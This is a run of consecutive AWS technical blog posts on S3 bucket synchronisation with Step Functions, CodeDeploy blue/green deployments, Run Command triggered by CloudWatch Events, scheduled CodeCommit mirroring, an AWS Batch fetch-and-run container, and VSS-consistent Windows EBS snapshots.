In this post, I have demonstrated the step-by-step process for end-to-end account creation in Organizations as well as how to automate the entire process. I also showed how to move a new account into an OU. This solution should save you some time and help you avoid common issues that tend to crop up in the manual account-creation process. To learn more about the features of Organizations, see the AWS Organizations User Guide. For more information about the APIs used in this post, see the Organizations API Reference.

If you have comments about this blog post, submit them in the “Comments” section below. If you have implementation or troubleshooting questions, start a new thread on the Organizations forum.

In my free time, I run a small blog that uses Amazon S3 to host static content and Amazon CloudFront to distribute it world-wide. I use a home-grown, static website generator to create and upload my blog content onto S3.

My blog uses two S3 buckets: one for staging and testing, and one for production. As a website owner, I want to update the production bucket with all changes from the staging bucket in a reliable and efficient way, without having to create and populate a new bucket from scratch. Therefore, to synchronize files between these two buckets, I use AWS Lambda and AWS Step Functions.

In this post, I show how you can use Step Functions to build a scalable synchronization engine for S3 buckets and learn some common patterns for designing Step Functions state machines while you do so.

Step Functions overview

Step Functions makes it easy to coordinate the components of distributed applications and microservices using visual workflows. Building applications from individual components that each perform a discrete function lets you scale and change applications quickly.

While this particular example focuses on synchronizing objects between two S3 buckets, it can be generalized to any other use case that involves coordinated processing of any number of objects in S3 buckets, or other, similar data processing patterns.

Bucket replication options

Before I dive into the details on how this particular example works, take a look at some alternatives for copying or replicating data between two Amazon S3 buckets:

The AWS CLI provides customers with a powerful aws s3 sync command that can synchronize the contents of one bucket with another (a sample invocation follows this list).

S3DistCP is a powerful tool for users of Amazon EMR that can efficiently load, save, or copy large amounts of data between S3 buckets and HDFS.
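For the aws s3 sync option, a typical invocation looks like the following (the bucket names are placeholders); the --delete flag also removes objects from the destination that no longer exist in the source:

aws s3 sync s3://my-source-bucket s3://my-destination-bucket --delete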

In this use case, you are looking for a slightly different bucket synchronization solution that:

Works within the same region

Is more scalable than a CLI approach running on a single machine

Doesn’t require managing any servers

Uses a more finely grained cost model than the hourly based Amazon EMR approach

You need a scalable, serverless, and customizable bucket synchronization utility.

Solution architecture

Your solution needs to do three things:

Copy all objects from a source bucket into a destination bucket, but leave out objects that are already present, for efficiency.

Delete all "orphaned" objects from the destination bucket that aren’t present on the source bucket, because you don’t want obsolete objects lying around.

Keep track of all objects for #1 and #2, regardless of how many objects there are.

In the beginning, you read in the source and destination buckets as parameters and perform basic parameter validation. Then, you operate two separate, independent loops, one for copying missing objects and one for deleting obsolete objects. Each loop is a sequence of Step Functions states that read in chunks of S3 object lists and use the continuation token to decide in a choice state whether to continue the loop or not.

This solution is based on the following architecture that uses Step Functions, Lambda, and two S3 buckets:

As you can see, this setup involves no servers, just two main building blocks:

Step Functions manages the overall flow of synchronizing the objects from the source bucket with the destination bucket.

A set of Lambda functions carry out the individual steps necessary to perform the work, such as validating input, getting lists of objects from source and destination buckets, copying or deleting objects in batches, and so on.

To understand the synchronization flow in more detail, look at the Step Functions state machine diagram for this example.

Walkthrough

Here’s a detailed discussion of how this works.

To follow along, use the code in the sync-buckets-state-machine GitHub repo. The code comes with a ready-to-run deployment script in Python that takes care of all the IAM roles, policies, Lambda functions, and of course the Step Functions state machine deployment using AWS CloudFormation, as well as instructions on how to use it.

Fine print: Use at your own risk

Before I start, here are some disclaimers:

Educational purposes only.

The following example and code are intended for educational purposes only. Make sure that you customize, test, and review it on your own before using any of this in production.

S3 object deletion.

In particular, using the code included below may delete objects on S3 in order to perform synchronization. Make sure that you have backups of your data. In particular, consider using the Amazon S3 Versioning feature to protect yourself against unintended data modification or deletion.

Step Functions execution starts with an initial set of parameters that contain the source and destination bucket names in JSON:
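The exact input keys are defined by the state machine in the repo; as an illustrative sketch only, starting an execution from the AWS CLI might look like this (the state machine ARN, bucket names, and key names are placeholders):

aws stepfunctions start-execution --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:sync-buckets --input '{"source": "my-source-bucket", "destination": "my-destination-bucket"}'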

Step 1: Detect the bucket region

First, you need to know the regions where your buckets reside. In this case, take advantage of the Step Functions Parallel state. This allows you to use a Lambda function get_bucket_location.py inside two different, parallel branches of task states:

FindRegionForSourceBucket

FindRegionForDestinationBucket

Each task state receives one bucket name as an input parameter, then detects the region corresponding to "their" bucket. The output of these functions is collected in a result array containing one element per parallel function.

Step 2: Combine the parallel states

The output of a parallel state is a list with all the individual branches’ outputs. To combine them into a single structure, use a Lambda function called combine_dicts.py in its own CombineRegionOutputs task state. The function combines the two outputs from step 1 into a single JSON dict that provides you with the necessary region information for each bucket.

Step 3: Validate the input

In this walkthrough, you only support buckets that reside in the same region, so you need to decide if the input is valid or if the user has given you two buckets in different regions. To find out, use a Lambda function called validate_input.py in the ValidateInput task state that tests if the two regions from the previous step are equal. The output is a Boolean.

Step 4: Branch the workflow

Use another type of Step Functions state, a Choice state, which branches into a Failure state if the comparison in step 3 yields false, or proceeds with the remaining steps if the comparison was successful.

Step 5: Execute in parallel

The actual work is happening in another Parallel state. Both branches of this state are very similar to each other and they re-use some of the Lambda function code.

Each parallel branch implements a looping pattern across the following steps:

Use a Pass state to inject either the string value "source" (InjectSourceBucket) or "destination" (InjectDestinationBucket) into the listBucket attribute of the state document.

The next step uses either the source or the destination bucket, depending on the branch, while executing the same, generic Lambda function. You don’t need two Lambda functions that differ only slightly. This step illustrates how to use Pass states as a way of injecting constant parameters into your state machine and as a way of controlling step behavior while re-using common step execution code.

The next step UpdateSourceKeyList/UpdateDestinationKeyList lists objects in the given bucket.

Remember that the previous step injected either "source" or "destination" into the state document’s listBucket attribute. This step uses the same list_bucket.py Lambda function to list objects in an S3 bucket. The listBucket attribute of its input decides which bucket to list. In the left branch of the main parallel state, use the list of source objects to work through copying missing objects. The right branch uses the list of destination objects, to check if they have a corresponding object in the source bucket and eliminate any orphaned objects. Orphans don’t have a source object of the same S3 key.

This step performs the actual work. In the left branch, the CopySourceKeys step uses the copy_keys.py Lambda function to go through the list of source objects provided by the previous step, then copies any missing object into the destination bucket. Its sister step in the other branch, DeleteOrphanedKeys, uses its destination bucket key list to test whether each object from the destination bucket has a corresponding source object, then deletes any orphaned objects.

The S3 ListObjects API action is designed to be scalable across many objects in a bucket. Therefore, it returns object lists in chunks of configurable size, along with a continuation token. If the API result has a continuation token, it means that there are more objects in this list. You can work from token to token to continue getting object list chunks, until you get no more continuation tokens.
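You can see this chunking behavior from the AWS CLI by limiting the number of results and passing the returned token back in, roughly like this (the bucket name and token value are placeholders):

aws s3api list-objects-v2 --bucket my-source-bucket --max-items 1000
# When more objects remain, the response includes a NextToken; pass it back to fetch the next chunk:
aws s3api list-objects-v2 --bucket my-source-bucket --max-items 1000 --starting-token <NextToken-from-previous-call>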

By breaking down large amounts of work into chunks, you can make sure each chunk is completed within the timeframe allocated for the Lambda function, and within the maximum input/output data size for a Step Functions state.

This approach comes with a slight tradeoff: the more objects you process at one time in a given chunk, the faster you are done. There’s less overhead for managing individual chunks. On the other hand, if you process too many objects within the same chunk, you risk going over time and space limits of the processing Lambda function or the Step Functions state so the work cannot be completed.

In this particular case, use a Lambda function that maximizes the number of objects listed from the S3 bucket that can be stored in the input/output state data. This is currently up to 32,768 bytes, assuming (based on some experimentation) that the execution of the COPY/DELETE requests in the processing states can always complete in time.

A more sophisticated approach would use the Step Functions retry/catch state attributes to account for any time limits encountered and adjust the list size accordingly.

Step 6: Test for completion

Because the presence of a continuation token in the S3 ListObjects output signals that you are not done processing all objects yet, use a Choice state to test for its presence. If a continuation token exists, it branches into the UpdateSourceKeyList step, which uses the token to get to the next chunk of objects. If there is no token, you’re done. The state machine then branches into the FinishCopyBranch/FinishDeleteBranch state.

By using Choice states like this, you can create loops exactly like the old times, when you didn’t have for statements and used branches in assembly code instead!

Step 7: Success!

Finally, you’re done, and can step into your final Success state.

Lessons learned

When implementing this use case with Step Functions and Lambda, I learned the following things:

Sometimes, it is necessary to manipulate the JSON state of a Step Functions state machine with just a few lines of code that hardly seem to warrant their own Lambda function. This is ok, and the cost is actually pretty low given Lambda’s 100 millisecond billing granularity. The upside is that functions like these can be helpful to make the data more palatable for the following steps or for facilitating Choice states. An example here would be the combine_dicts.py function.

Pass states can be useful beyond debugging and tracing; they can be used to inject arbitrary values into your state JSON and guide generic Lambda functions into doing specific things.

Choice states are your friend because you can build while-loops with them. This allows you to reliably grind through large amounts of data with the patience of an engine that currently supports execution times of up to 1 year.

Currently, there is an execution history limit of 25,000 events. Each Lambda task state execution takes up 5 events, while each choice state takes 2 events for a total of 7 events per loop. This means you can loop about 3500 times with this state machine. For even more scalability, you can split up work across multiple Step Functions executions through object key sharding or similar approaches.

It’s not necessary to spend a lot of time coding exception handling within your Lambda functions. You can delegate all exception handling to Step Functions and instead simplify your functions as much as possible.

Step Functions are great replacements for shell scripts. This could have been a shell script, but then I would have had to worry about where to execute it reliably, how to scale it if it went beyond a few thousand objects, etc. Think of Step Functions and Lambda as tools for scripting at a cloud level, beyond the boundaries of servers or containers. "Serverless" here also means "boundary-less".

Summary

This approach gives you scalability by breaking down any number of S3 objects into chunks, then using Step Functions to control logic to work through these objects in a scalable, serverless, and fully managed way.

Amazon Web Services offers services that enable organizations to leverage the power of the cloud for their development and deployment needs. AWS CodeDeploy makes it possible to automate the deployment of code to either Amazon EC2 or on-premises instances. AWS CodeDeploy now supports blue/green deployments. In this blog post, I will discuss the benefits of blue/green deployments and show you how to perform one.

The benefits of blue/green deployments

Blue/green deployment involves two production environments:

Blue is the active environment.

Green is for the release of a new version.

Here are some of the advantages of a blue/green deployment:

You can perform testing on the green environment without disrupting the blue environment.

Switching to the green environment involves no downtime. It only requires the redirecting of user traffic.

Rolling back from the green environment to the blue environment in the event of a problem is easier because you can redirect traffic to the blue environment without having to rebuild it.

You can incorporate the principle of infrastructure immutability by provisioning fresh instances when you need to make changes. In this way, you avoid configuration drift.

AWS CodeDeploy offers two ways to perform blue/green deployments:

In the first approach, AWS CodeDeploy makes a copy of an Auto Scaling group, which in turn provisions new Amazon EC2 instances. AWS CodeDeploy then deploys the application to these new instances and redirects traffic to the newly deployed code.

In the second approach, you use instance tags or an Auto Scaling group to select the instances that will be used for the green environment. AWS CodeDeploy then deploys the code to the tagged instances.

So how do you set up your first blue environment? A best practice is to start with an in-place deployment. You can also start with an existing, empty Auto Scaling group.

An example of blue/green deployments

Let’s take a look at an example of how to use Auto Scaling groups to perform a blue/green deployment.

Overview

In the following figure, the example environment includes an Amazon EC2 instance that serves as a workstation for AWS CodeDeploy. A release manager or developer could use this workstation to deploy new versions of code. The blue environment consists of an Auto Scaling group that provisions two more instances to function as web servers. The web servers will initially contain the first version of an application and the AWS CodeDeploy agent. A load balancer directs traffic to the two web servers in a round-robin manner.

The release manager uses the workstation instance to push a new version of the application to AWS CodeDeploy and starts a blue-green deployment. AWS CodeDeploy creates a copy of the Auto Scaling group. It launches two new web server instances just like the original two. AWS CodeDeploy installs the new version of the application and then redirects the load balancer to the new instances. The original instances continue to be part of the original Auto Scaling group. They can be reattached to the load balancer, if needed.

Prerequisites

To complete this example, you need the following:

An AWS region and Availability Zone in which you can provision the environment.

An Amazon EC2 key pair.

Working knowledge of the aforementioned services and the AWS Management Console, and familiarity with connecting to an Amazon EC2 instance.

Other Considerations

You will incur charges from AWS for the use of the underlying AWS services in this example. The Amazon EC2 t2.micro instances and Amazon S3 storage might be covered under the AWS Free Tier, depending on your eligibility. The resources provided in this example are for training purposes. Be sure to consider the security needs of your organization when implementing techniques similar to those described in this blog post.

Step 1: Create the initial environment

Download an archive containing the sample template from this location and save it in a convenient location.

If this is a new AWS CloudFormation account, click Create New Stack. Otherwise, click Create Stack.

Under Upload a template to Amazon S3, click Choose File, choose the YAML file from the archive you downloaded, and then click Next.

In Specify Details, in Stack name, type bluegreen.

In AZName, select one of the Availability Zones. (In this blog post, I am using us-east-1a.)

In BlueGreenKeyPairName, select the key pair to use.

In NamePrefix, use the default value of bluegreen unless you are already running an application with a name that starts with bluegreen. The name prefix is used to assign name tags to the created resources. Click Next.

On the Options page, click Next.

Select the acknowledgement box to allow the creation of IAM resources, and then click Create. It will take CloudFormation about 10 minutes to create the sample environment. In addition to creating the infrastructure resources shown in the diagram, the CloudFormation template also sets up an AWS CodeDeploy application and blue/green deployment group.

Step 2: Review initial environment

Look at the CloudFormation stack outputs. You should see something similar to the following. WorkstationIP is the IP address of the workstation instance. AutoScalingGroup and LoadBalancer are the DNS names created by CloudFormation for the Auto Scaling group and the Elastic Load Balancing load balancer.

Copy the LoadBalancer value into your browser and browse to that link. The following application should be displayed. This PHP application queries the Amazon EC2 instance metadata. If you refresh the page, you will see the IP address and instance ID change in accordance with the round-robin load balancing algorithm.

Go to the EC2 console and display the instances. You will see three running instances associated with this example: the workstation and the two web server instances created by the Auto Scaling group. The web server instances make up the blue environment.

Step 3: Deploy the new version of code

Connect to the workstation instance at the address displayed in WorkStationIP. This instance is running the Ubuntu operating system, so the user name is ubuntu. After you sign in, you will see two directories. The scripts directory contains Bourne shell scripts. The newversion directory contains an update to the PHP application.

Here is the PHP code for the new version in newversion/content/index.php. The only difference from the initially installed code is the application version number.

Now look at the following scripts/pushnewversion.sh shell script. It uses the aws deploy push command to bundle the code and upload it to Amazon S3.
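A minimal sketch of such a push, using the application name from this example, the newversion directory, and a placeholder S3 bucket, looks like this:

aws deploy push --application-name bluegreen-app --s3-location s3://my-codedeploy-bucket/newversion.zip --source newversion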

Run the pushnewversion.sh script. You will see a message that tells you how to deploy the code with the AWS CLI, but we will use the AWS CodeDeploy console to do this instead.

Click the link for bluegreen-app. If you chose a name other than the default for NamePrefix, click that name instead. Expand Revisions. You will see the revision you just pushed from the AWS CodeDeploy workstation. Click Deploy revision.

On the Create deployment page, select the bluegreen-app application and the bluegreen-dg deployment group. Leave all the other default values in place, and then click Deploy. AWS CodeDeploy will provision the Auto Scaling group and instances, deploy the code, set up health checks, and redirect traffic to the new instances. This process will take a few minutes. When the deployment is complete, the deployment should appear, as shown here. AWS CodeDeploy skips the termination of the original instances because of the settings in the deployment group.

Step 4: Review the updated environment

Browse to the DNS name for the load balancer. You should see the new version of the application, as shown here. The application version has changed from 1 to 2, as expected.

Go to the EC2 console and display the instances. You will see four instances that have been tagged by the Auto Scaling group and launch configuration. The instances with IP addresses 10.200.11.11 and 10.200.11.192 are the ones we saw before in the blue environment. The deployment process created the instances with IP addresses 10.200.11.13 and 10.200.22 that are now part of the green environment.

Go to the Auto Scaling console. You will see that there are now two Auto Scaling groups, each of which has two instances. The Auto Scaling group whose name begins with CodeDeploy was created during the deployment process.

You have now successfully completed a blue/green deployment using AWS CodeDeploy.

Step 5: Cleanup

Return to the session on the AWS CodeDeploy workstation.

Run the scripts/cleanup.sh script. This will remove the deployment bundle and shut down the Auto Scaling groups.

Go to the CloudFormation console, select the stack you created, and delete it.

Conclusion

AWS CodeDeploy enables developers to automate code deployments to Amazon EC2 and on-premises instances. The blue/green deployment option enables release managers to create a new production environment and makes it easier to roll back to the previous environment if problems arise. For more information about AWS CodeDeploy, see the AWS CodeDeploy documentation. You can get started in just a few clicks.

EC2 Run Command is part of EC2 Systems Manager. It allows you to operate on collections of EC2 instances and on-premises servers reliably and at scale, in a controlled and selective fashion. You can run scripts, install software, collect metrics and log files, manage patches, and much more, on both Windows and Linux.

CloudWatch Events gives you the ability to track changes to AWS resources in near real-time. You get a stream of system events that you can easily route to one or more targets including AWS Lambda functions, Amazon Kinesis streams, Amazon SNS topics, and built-in EC2 and EBS targets.

Better Together

Today we are bringing these two services together. You can now create CloudWatch Events rules that use EC2 Run Command to perform actions on EC2 instances or on-premises servers. This opens the door to all sorts of interesting ideas; here are a few that I came up with:

Final Log Collection – Collect application or system logs from instances that are being shut down (either manually or as a result of a scale-in operation initiated by Auto Scaling).

Instance Setup – After an instance has started, download & install applications, set parameters and configurations, and launch processes.

Configuration Updates – When a config file is changed in S3, install it on applicable instances (perhaps determined by tags). For example, you could install an updated Apache web server config file on a set of properly tagged instances, and then restart the server so that it picks up the changes. Or, update an instance-level firewall each time the AWS IP Address Ranges are updated.

EBS Snapshot Testing and Tracking – After a fresh snapshot has been created, mount it on a test instance, check the filesystem for errors, and then index the files in the snapshot.

Instance Coordination – Every time an instance is launched or terminated, inform the others so that they can update internal tracking information or rebalance their workloads.

I’m sure that you have some more interesting ideas; please feel free to share them in the comments.

Time for Action!

Let’s set this up. Suppose I want to run a specific shell script every time Auto Scaling adds another instance to an Auto Scaling Group.

I start by opening the CloudWatch Events Console and clicking on Create rule:

I configure my Event Source to be my Auto Scaling Group (AS-Main-1), and indicate that I want to take action when EC2 instances are launched successfully:

Then I set up the target. I choose SSM Run Command, pick the AWS-RunShellScript document, and indicate that I want the command to be run on the instances that are tagged as coming from my Auto Scaling group:

Then I click on Configure details, give my rule a name and a description, and click on Create rule:

With everything set up, the command service httpd start will be run on each instance launched as a result of a scale out operation.

Available Now

This new feature is available now and you can start using it today.

Many of our customers have expressed interest in the following scenarios:

Backing up or replicating an AWS CodeCommit repository to another AWS region.

Automatically backing up repositories currently hosted on other services (for example, GitHub or BitBucket) to AWS CodeCommit.

In this blog post, we’ll show you how to automate the replication of a source repository to a repository in AWS CodeCommit. Your source repository could be another AWS CodeCommit repository, a local repository, or a repository hosted on other Git services.

To replicate your repository, you’ll first need to set up a repository in AWS CodeCommit to use as your backup/replica repository. After replicating the contents in your source repository to the backup repository, we’ll demonstrate how you can set up a scheduled job to periodically sync up your source repository with the backup/replica.

Where do I host this?

You can host your local repository and schedule your task on your own machine or on an Amazon EC2 instance. For an example of how to set up an EC2 instance for access to an AWS CodeCommit repository, including a sample AWS CloudFormation template for launching the instance, see Launch an Amazon EC2 Instance to Access the AWS CodeCommit Repository in the AWS for DevOps Guide.

Part 1: Set Up a Replica Repository

In this section, we’ll create an AWS CodeCommit repository and replicate your source repository to it.

If you haven’t already done so, set up for AWS CodeCommit. Then follow the steps to create a CodeCommit repository in the region of your choice. Choose a name that will help you remember that this repository is a replica or backup repository. For example, you could create a repository in the US East (Ohio) region and name it MyReplicaRepo. This is the name and region we’ll use in this post.

Use the git clone --mirror command to clone the source repository to your local computer, specifying the directory where you want to create the local repo. You are not cloning the repository you just created in AWS CodeCommit. You are cloning the repository you want to replicate or back up to that AWS CodeCommit repository. For example, you can clone a sample application created for AWS demonstration purposes and hosted on GitHub (https://github.com/awslabs/aws-demo-php-simple-app.git) to a local repo in a directory named my-repo-replica.
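Using that repository URL and directory name, the command is:

git clone --mirror https://github.com/awslabs/aws-demo-php-simple-app.git my-repo-replica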

DO NOT use your working directory as the local clone repository. Your work-in-progress commits would also be pushed for backup.

DO NOT make local changes to this local repository. It should be used for sync-up operations only.

DO NOT manually push any changes to this replica repository. It will cause conflicts later when your scheduled job pushes changes in the source repository. Treat it as a read-only repository, and push all of your development changes to your source repository.

Change directories to the directory where you made the clone:

cd my-repo-replica

Use the git remote add RemoteName RemoteRepositoryURL command to add the AWS CodeCommit repository you created as a remote repository for the local repo. Use an appropriate nickname, such as sync. (Because this is a mirror, the default nickname, origin, will already be in use.) For example, you can add your AWS CodeCommit repository MyReplicaRepo as a remote for my-repo-replica with the nickname sync.
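Assuming MyReplicaRepo is in the US East (Ohio) region and you connect over HTTPS, the command would look like the following (verify the clone URL shown for your repository in the AWS CodeCommit console):

git remote add sync https://git-codecommit.us-east-2.amazonaws.com/v1/repos/MyReplicaRepo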

When you push large repositories, consider using SSH instead of HTTPS. When you push a large change, a large number of changes, or a large repository, long-running HTTPS connections are often terminated prematurely due to networking issues or firewall settings. For more information about setting up AWS CodeCommit for SSH, see For SSH Connections on Linux, macOS, or Unix or For SSH Connections on Windows.

Tip

Use the git remote show command to review the list of remotes set for your local repo.

Run the git push sync --mirror command to push to your replica repository.

If you named your remote for the replica repository something else, replace sync with your remote name.

The --mirror option specifies that all refs under refs/ (which includes, but is not limited to, refs/heads/, refs/remotes/, and refs/tags/) will be mirrored to the remote repository. If you only want to push branches and commits, but don’t care if you push other references such as tags, you can use the --all option instead.

Your replica repository is now ready for sync-up operations. To do a manual sync, run git pull to pull from your original repository, and then run git push sync --mirror to push to the replica repository. Again, do not push any local changes to your replica repository at any time.

Part 2: Create a Periodic Sync Job

You can use a number of tools to set up an automated sync job. In this section, we’ll briefly cover four common tools: a cron job (Linux), a task in Windows Task Scheduler (Windows), a launchd instance (macOS), and, for those users who already have a Jenkins server set up, a Freestyle project with build triggers. Feel free to use whatever tools are best for you.

Note

Some hosted repositories offer options for syncing repositories, such as Git hooks, notifications, and other triggers. To learn more about those options, consult the documentation for your source repository system.

All of the following approaches rely on commands that pull the latest changes from the source repository to your local clone repo, and then mirror those changes to your AWS CodeCommit repository. They can be summed up as follows:

cd /path/to/your/local/repo
git pull
git push sync --mirror

Where and how you save and schedule these commands depends on your operating system and tool(s). We’ve included just a few options/examples from a variety of approaches.

In Linux:

At the terminal, run the crontab -e command to edit your crontab file in your default editor.

Add a line for a new cron job that will change directories to your local clone repo, pull from your source repository, and mirror any changes to your AWS CodeCommit repository on the schedule you specify. For example, to run a daily job at 2:45 A.M. for a local repo named my-repo-replica in the ~/tmp directory where you nicknamed your remote (the AWS CodeCommit repository) sync, your new line might look like this:
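Here is a sketch of such a crontab entry, using the example path and remote name above:

45 2 * * * cd ~/tmp/my-repo-replica && git pull && git push sync --mirror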

In Windows:

Create a batch file that contains the command to change directories to your local clone repo, pull from your source repository, and mirror any changes up to your AWS CodeCommit repository. For example, if you created your local repo my-repo-replica in a c:\temp directory, and you nicknamed your remote (the AWS CodeCommit repository) sync, your file might look like this:

cd /d c:\temp\my-repo-replica
git pull
git push sync --mirror

Save the batch file with a name like my-repo-backup.bat.

Open Task Scheduler. (Not sure how? The simplest way is to open a command line and run taskschd.msc.)

In Actions, choose Create Basic Task, and then follow the steps in the wizard.

In macOS:

Create a shell script that contains the command to change directories to your local clone repo, pull from your source repository, and mirror any changes up to your AWS CodeCommit repository. For example, if you created your local repo my-repo-replica in a ~/Documents directory, and you nicknamed your remote (the AWS CodeCommit repository) sync, your file might look like this:

cd ~/Documents/my-repo-replica
git pull
git push sync --mirror

Save the shell script with a name like my-repo-backup.sh.

Create a launchd property list file that runs the shell script on the schedule you specify. For example, if you stored my-repo-backup.sh in ~/Documents, to run the script daily at 2:45 A.M., your plist file might look like this:

Save your plist file in ~/Library/LaunchAgents, /Library/LaunchAgents, or /Library/LaunchDaemons folder, depending on the definition you want for the job.

Run the launchctl command to load your job. For example, if you want to load a plist file named codecommit.sync.plist in ~/Library/LaunchAgents, your command might look like this:

launchctl load ~/Library/LaunchAgents/codecommit.sync.plist

For Jenkins:

Open Jenkins.

Create a new job as a Freestyle project.

In the Build Triggers section, select Build periodically, and set up a schedule for the task. Jenkins uses cron expressions to run periodic tasks. For more information, see the Jenkins documentation for the syntax of cron.

If you are replicating a GitHub or BitBucket repository, you can also set the task to build when the Git hook is triggered.

The following example builds once a day between midnight and 1 A.M.

In the Build section, add a build step and choose Execute Windows batch command or Execute Shell. Then write a script and implement the Git operations:

cd /path/to/your/local/repo
git pull
git push sync --mirror

Note: Jenkins may require the full path for Git.

The following example is a Windows batch command file, with the full path for Git on the host.

Save the configuration for the task.

Your AWS CodeCommit replica repository will now be automatically updated with any changes to your source repository as scheduled.

We hope you’ve enjoyed this blog post. If you have questions or suggestions for future blog posts, please leave them in the comments below or visit our user forum!

Docker enables you to create highly customized images that are used to execute your jobs. These images allow you to easily share complex applications between teams and even organizations. However, sometimes you might just need to run a script!

This post details the steps to create and run a simple “fetch & run” job in AWS Batch. AWS Batch executes jobs as Docker containers using Amazon ECS. You build a simple Docker image containing a helper application that can download your script or even a zip file from Amazon S3. AWS Batch then launches an instance of your container image to retrieve your script and run your job.

AWS Batch overview

AWS Batch enables developers, scientists, and engineers to easily and efficiently run hundreds of thousands of batch computing jobs on AWS. AWS Batch dynamically provisions the optimal quantity and type of compute resources (e.g., CPU or memory optimized instances) based on the volume and specific resource requirements of the batch jobs submitted.

With AWS Batch, there is no need to install and manage batch computing software or server clusters that you use to run your jobs, allowing you to focus on analyzing results and solving problems. AWS Batch plans, schedules, and executes your batch computing workloads across the full range of AWS compute services and features, such as Amazon EC2 Spot Instances.

Prerequisites

Before you get started, there are a few things to prepare. If this is the first time you have used AWS Batch, you should follow the Getting Started Guide and ensure that you have a valid job queue and compute environment.

After you are up and running with AWS Batch, the next step is to have an environment in which to build and register the Docker image. For this post, register this image in an ECR repository. This is a private repository by default and can easily be used by AWS Batch jobs.

Building the fetch & run Docker image

The fetch & run Docker image is based on Amazon Linux. It includes a simple script that reads some environment variables and then uses the AWS CLI to download the job script (or zip file) to be executed.

The FROM line instructs Docker to pull the base image from the amazonlinux repository, using the latest tag.

The RUN line executes a shell command as part of the image build process.

The ADD line copies the fetch_and_run.sh script into the /usr/local/bin directory inside the image.

The WORKDIR line sets the default directory to /tmp when the image is used to start a container.

The USER line sets the default user that the container executes as.

Finally, the ENTRYPOINT line instructs Docker to call the /usr/local/bin/fetch_and_run.sh script when it starts the container. When running as an AWS Batch job, it is passed the contents of the command parameter.
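Putting those lines together, a minimal sketch of such a Dockerfile might look like the following (the exact packages installed by the RUN line are an assumption for illustration):

FROM amazonlinux:latest
RUN yum -y install which unzip aws-cli
ADD fetch_and_run.sh /usr/local/bin/fetch_and_run.sh
WORKDIR /tmp
USER nobody
ENTRYPOINT ["/usr/local/bin/fetch_and_run.sh"]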

Now, build the Docker image! Assuming that the docker command is in your PATH and you don’t need sudo to access it, you can build the image with the following command (note the dot at the end of the command):
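Assuming the image is tagged awsbatch/fetch_and_run:

docker build -t awsbatch/fetch_and_run .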

Push the built image to ECR

Now that you have a Docker image and an ECR repository, it is time to push the image to the repository. Use the following AWS CLI commands if you have used the previous example names. Replace the AWS account number with your own account.
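For example, assuming the repository is named awsbatch/fetch_and_run in us-east-1, a recent AWS CLI, and 012345678901 as a placeholder account number, the push might look like this:

aws ecr get-login-password --region us-east-1 | docker login --username AWS --password-stdin 012345678901.dkr.ecr.us-east-1.amazonaws.com
docker tag awsbatch/fetch_and_run:latest 012345678901.dkr.ecr.us-east-1.amazonaws.com/awsbatch/fetch_and_run:latest
docker push 012345678901.dkr.ecr.us-east-1.amazonaws.com/awsbatch/fetch_and_run:latest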

Create a simple job script and upload to S3

Next, create and upload a simple job script that is executed using the fetch_and_run image that you just built and registered in ECR. Start by creating a file called myjob.sh with the example content below:
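A sketch of such a script (AWS_BATCH_JOB_ID is an environment variable that AWS Batch sets for the running job):

#!/bin/bash
date
echo "Args: $@"
env
echo "This is my simple test job!"
echo "jobId: $AWS_BATCH_JOB_ID"
sleep 30
date
echo "bye bye!!"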

When you submit the job, add an environment variable with Key=BATCH_FILE_S3_URL and Value=s3:///myjob.sh. Don’t forget to use the correct URL for your file.
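For illustration, a SubmitJob call from the CLI might look like the following; the job queue and job definition names are placeholders for whatever you created for the fetch_and_run image:

aws batch submit-job \
  --job-name script_test \
  --job-queue my-job-queue \
  --job-definition fetch_and_run \
  --container-overrides '{"command": ["myjob.sh", "60"], "environment": [{"name": "BATCH_FILE_S3_URL", "value": "s3://my-bucket/myjob.sh"}, {"name": "BATCH_FILE_TYPE", "value": "script"}]}'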

After the job is completed, check the final status in the console.

In the job details page, you can also choose View logs for this job in CloudWatch console to see your job log.

How the fetch and run image works

The fetch_and_run image works as a combination of the Docker ENTRYPOINT and COMMAND feature, and a shell script that reads environment variables set as part of the AWS Batch job. When building the Docker image, it starts with a base image from Amazon Linux and installs a few packages from the yum repository. This becomes the execution environment for the job.

If the script you planned to run needed more packages, you would add them using the RUN parameter in the Dockerfile. You could even change it to a different base image such as Ubuntu, by updating the FROM parameter.

Next, the fetch_and_run.sh script is added to the image and set as the container ENTRYPOINT. The script simply reads some environment variables and then downloads and runs the script/zip file from S3. It looks for the following environment variables: BATCH_FILE_TYPE and BATCH_FILE_S3_URL. If you run fetch_and_run.sh with no environment variables, you get the following usage message:

This shows that it supports two values for BATCH_FILE_TYPE, either “script” or “zip”. When you set “script”, it causes fetch_and_run.sh to download a single file and then execute it, in addition to passing in any further arguments to the script. If you set it to “zip”, this causes fetch_and_run.sh to download a zip file, then unpack it and execute the script name passed and any further arguments. You can use the “zip” option to pass more complex jobs with all of the application’s dependencies in one file.

Finally, the ENTRYPOINT parameter tells Docker to execute the /usr/local/bin/fetch_and_run.sh script when creating a container. In addition, it passes the contents of the COMMAND parameter as arguments to the script. This is what enables you to pass the script and arguments to be executed by the fetch_and_run image with the Command field in the SubmitJob API action call.

Summary

In this post, I detailed the steps to create and run a simple “fetch & run” job in AWS Batch. You can now easily use the same job definition to run as many jobs as you need by uploading a job script to Amazon S3 and calling SubmitJob with the appropriate environment variables.

In my previous blog post, I discussed the challenge of creating Amazon EBS snapshots when you cannot turn off the instance during backup, because doing so might exclude data that has been cached by applications or the operating system. I showed how you can use EC2 Systems Manager to run a script remotely on EC2 instances to prepare the applications and the operating system for backup and to automate the creation of snapshots on a daily basis. I gave a practical example of creating consistent Amazon EBS snapshots of Amazon Linux running a MySQL database.

In this post, I walk you through another practical example to create consistent snapshots of a Windows Server instance with Microsoft VSS (Volume Shadow Copy Service).

Understanding the example

The VSS service initiates and oversees the creation of shadow copies. A shadow copy is a point-in-time, consistent snapshot of a logical volume (for example, C:), which is different from an EBS snapshot of the underlying volume. Multiple components are involved in the shadow copy creation:

The VSS requester requests the creation of shadow copies.

The VSS provider creates and maintains the shadow copies.

The VSS writers guarantee that you have a consistent data set to back up. They flush and freeze I/O operations, before the VSS provider creates the shadow copies, and release I/O operations, after the VSS provider has completed this action. There is usually one VSS writer for each VSS-compatible application.

I use Run Command to execute a PowerShell script on the Windows instance:

It creates a third file named scriptVss.txt containing DiskShadow commands. DiskShadow is a tool included in Windows Server 2008 and above, that exposes the functionality offered by the VSS service. The script creates a shadow copy of each logical volume stored on EBS, runs the shell script ebsSnapshot.cmd to create a snapshot of underlying EBS volumes, and then deletes the shadow copies to free disk space.
